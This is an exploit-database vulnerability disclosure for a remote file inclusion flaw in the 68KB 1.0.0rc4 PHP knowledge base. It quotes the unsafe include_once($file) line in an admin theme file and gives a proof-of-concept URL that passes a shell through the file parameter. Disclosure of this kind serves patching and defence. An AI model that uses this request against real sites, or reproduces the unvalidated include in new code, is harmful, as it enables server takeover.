68KB 1.0.0rc4 - Remote File Inclusion

Author: eidelweiss
type: webapps
platform: php
port: 
date_added: 2010-08-03 
date_updated: 2010-08-08 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.com68designs-68KB-v1.0.0rc4-0-gac50576.tar.gz

====================================================
68KB v1.0.0rc4 Remote File Include Vulnerability
====================================================

Vendor:     http://68kb.com
download:   http://github.com/68designs/68KB/downloads
Author:     eidelweiss
Contact:    g1xsystem[at]windowslive.com
Original Advisories :	http://eidelweiss-advisories.blogspot.com/2010/08/68kb-v100rc4-remote-file-include.html
=====================================================================

Description:
68KB is an open source PHP MySQL driven knowledge base script. Built with you in mind to make it easy to configure and setup.

Note:
This is the same vuln in other lower version (http://www.exploit-db.com/exploits/11904/)
Vendor Not Fix the vulnerability in all folder !!!

=====================================================================

    -=[ vuln c0de ]=-

[!] path/themes/admin/default/modules/show.php


	<?php include_once($file); ?>

=====================================================================

    -=[ P0C ]=-

    http://127.0.0.1/path/themes/admin/default/modules/show.php?file= [inj3ct0r shell]

=========================| -=[ E0F ]=- |=================================